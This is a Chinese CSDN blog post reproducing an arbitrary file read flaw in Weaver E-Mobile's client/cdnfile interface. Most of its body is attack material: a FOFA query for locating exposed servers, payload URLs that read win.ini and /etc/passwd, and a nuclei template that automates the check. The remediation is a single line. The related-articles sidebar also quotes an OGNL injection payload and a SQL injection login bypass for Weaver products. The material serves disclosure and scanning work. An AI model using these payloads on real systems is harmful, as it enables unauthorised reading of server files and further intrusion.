泛微E-Mobile client/cdnfile 任意文件读取漏洞

最新推荐文章于 2024-09-23 22:01:11 发布
最新推荐文章于 2024-09-23 22:01:11 发布
阅读量308 收藏 5
点赞数 3
分类专栏: 漏洞复现 文章标签: 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/142377128
版权

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞,攻击者可以读取系统的敏感文件

搜索语法

fofa

app="泛微-EMobile"

漏洞复现

windows
payload

http://ip//client/cdnfile/1C/windows/win.ini?windows

在这里插入图片描述
linux
payload

http://ip/client/cdnfile/C/etc/passwd?linux

nuclei

id: fanweiE-Mobile-client-cdnfile-anyfile-read

info: 
 name: 泛微E-Mobile clientcdnfile 任意文件读取漏洞
 author: xl
 description: 泛微移动管理client/cdnfile接口任意文件读取漏洞
 severity: high

requests:
  - method: GET
    path:
      - "/client/cdnfile/C/etc/passwd?linux"
      - "/client/cdnfile/1C/windows/win.ini?windows"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root"
          - "fonts"

修复建议

升级到最新版本

抠脚大汉在网络
关注
专栏目录
泛微移动平台e-mobile漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 8517
泛微移动平台e-mobile漏洞利用基本信息 漏洞情报编号:vulbox-intel-15244 是否可自动化组件:是 CVE-ID:暂无 发布日期:2022/04/01 15:48:45 CNNVD-ID:暂无 最新更新时间:2022/04/08 18:02:59 CNVD-ID:CNVD-2017-02376
漏洞复现】泛微OA E-Mobile 移动管理平台 lang2sql 任意文件上传漏洞
凝聚力安全团队
06-19 1984
泛微OA E-Mobile 移动管理平台 lang2sql 接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
漏洞复现】泛微e-Mobile 移动管理平台文件上传漏洞
qq_34780861的博客
04-25 2647
泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台存在任意文件上传漏洞
泛微E-Mobile installOperate.do SSRF漏洞
weixin_43167326的博客
07-25 774
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞
CommputerMac的博客
11-07 5253
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
泛微E-Mobile 6.0命令执行漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-10 1476
泛微E-Mobile 6.0存在命令执行漏洞的问题,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
泛微E-Mobile client/cdnfile 任意文件读取漏洞复现
0xSec
09-18 1344
泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
泛微移动管理平台E-mobile client/cdnfile/接口存在任意文件读取 附POC
最新发布
nnn2188185的博客
09-23 375
泛微移动管理平台E-mobile client/cdnfile/接口存在任意文件读取
泛微E-Mobile /client.do 命令执行漏洞复现
0xSec
04-04 2174
泛微E-Mobile存在命令执行漏洞,攻击者可以通过/client.do执行任意命令执行,从而获得服务器权限。
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
凝聚力安全团队
06-18 730
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
泛微e-mobile cdnfile 任意文件读取复现
iSee857的博客
09-19 979
泛微e-mobile遵循以客户为中心,以企业中的事务为导向的出发点,帮助企业构建以员工为核心的移动统一办公平台。e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。厂商已发布补丁请及时修复。
漏洞预警】泛微E-mobile v9.5任意文件上传漏洞
做自己喜欢的事,并将其发挥到极致!
05-31 4895
泛微 E-mobile v9.5 存在任意文件上传漏洞
泛微移动平台e-mobile漏洞利用的修复方案
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 5317
泛微移动平台e-mobile漏洞利用的修复方案1. 对产生漏洞模块的传入参数进行有效性检测,对传入的参数进行限定2. 当用户输入限定字符时,立刻转向自定义的错误页,不能使用服务器默认的错误输出方式 3. 对以上标签进行危险字符过滤,禁止('、"、+、%、&、、()、;、and、select等)特殊字符的传入 4. 加密数据库内存储信息 5. 与数据库链接并访问数据时,使用参数化查询方式进行链接访问
0day 未公开 泛微E-Cology 存在源码信息泄露漏洞
weixin_43167326的博客
07-09 1089
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。。
泛微 E-Mobile Ognl 表达式注入
m0_51747642的博客
07-30 3964
泛微OA办公系统是一款协调办公软件。 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。 使用bp抓包 发送到重发器更改请求头为POST 一执行下面面的代码就直接执行命令了 message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse...
E-Mobile 后台管理系统漏洞
热门推荐
L6y1a
02-20 1万+
转载:https://blog.csdn.net/qq_27446553/article/details/68203308 E-Mobile 后台管理系统漏洞 可以通过火狐hackbar插件进行验证 Poc : message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensym...
泛微 漏洞汇总
qq_39541626的博客
05-09 6999
SQL注入 前台SQL注入 用户名:admin’ or password like ‘c4ca4238a0b923820dcc509a6f75849b’ and ‘a’='a 密码: 1 验证页面参数 - loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&am
泛微e-mobile 6.0远程命令执行漏洞
09-06
泛微e-mobile 6.0远程命令执行漏洞是指泛微e-mobile 6.0版本中存在的一种安全漏洞,攻击者可以利用该漏洞通过远程方式执行恶意命令,从而获取系统权限并对系统进行非法操作。 该漏洞的产生是因为泛微e-mobile 6.0在接收用户输入时没有正确地过滤或验证输入的内容,导致攻击者可以通过构造恶意请求向系统发送包含恶意命令的数据,进而执行指定的操作。 攻击者可以通过利用该漏洞执行一系列恶意操作,如获取系统权限、窃取敏感信息、篡改系统配置和数据等。由于该漏洞的严重性,攻击者可以对系统进行任意操控,对目标系统造成严重的威胁和损害。 为了防止该漏洞的利用,用户和系统管理员可以采取以下防护措施: 1. 及时升级:建议用户及时升级泛微e-mobile至最新版本,以确保系统安全性。 2. 配置安全策略:通过配置系统安全策略,限制远程访问权限,尽量减少攻击面。 3. 安全加固:加强服务器的安全配置,包括访问控制、强化密码策略、防火墙等措施。 4. 审计系统日志:定期审计系统日志,及时发现异常活动,以便采取适当的应对措施。 5. 安全培训:提高员工的安全意识,加强信息安全培训,避免因人为操作造成漏洞被利用。 总之,对于泛微e-mobile 6.0远程命令执行漏洞,用户和系统管理员应该保持警惕,及时采取相应的安全防护措施,以保护系统的安全和稳定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值